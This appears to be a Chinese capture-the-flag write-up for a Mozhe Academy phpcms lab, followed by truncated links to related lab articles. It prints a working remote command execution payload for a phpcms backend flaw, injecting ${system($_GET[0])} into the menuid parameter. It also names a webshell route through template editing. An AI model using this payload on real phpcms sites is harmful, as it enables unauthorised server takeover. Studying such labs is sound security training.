靶场地址:
https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe
用到的漏洞介绍:
漏洞编号:WooYun-2015-0153630
漏洞名称:phpcms后台低权限任意命令执行
Poc:
index.php?0=[命令]&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
首先找到后台地址,养成好习惯先查看robots.txt是否有有用的信息
发现了后台地址,并且账号密码自动填充,可以直接登录
这里获得key有两种方法,一种是在界面-模板风格修改代码注入一句话木马,然后使用菜刀连接。
一种是使用上述漏洞执行代码
执行ls命令,发现key所在
执行cat key_16041211526820.php,查看网页源代码
御剑扫描发现后台登录地址 admin.php 登录后台http://ip地址/admin.php 后台用户名密码自...
靶场地址:https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRU...
靶场地址:https://www.mozhe.cn/bug/detail/UFZ4K3FhM0JudDdyempz...
靶场地址:https://www.mozhe.cn/bug/detail/dS85cFFTQnl1cUZHa3Bs...
靶场地址: https://www.mozhe.cn/bug/detail/c2lPNDl1cVUydGFCUnY...
靶场地址:https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxz...
靶场地址:https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9u...
靶场地址:https://www.mozhe.cn/bug/detail/VkFCM3lXb0t5dFBNNkVL...
靶场地址:https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4...
一、漏洞简介 新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开...
本文标题:墨者学院-CMS系统漏洞分析溯源(第2题)
本文链接:https://www.haomeiwen.com/subject/xrrmkctx.html
网友评论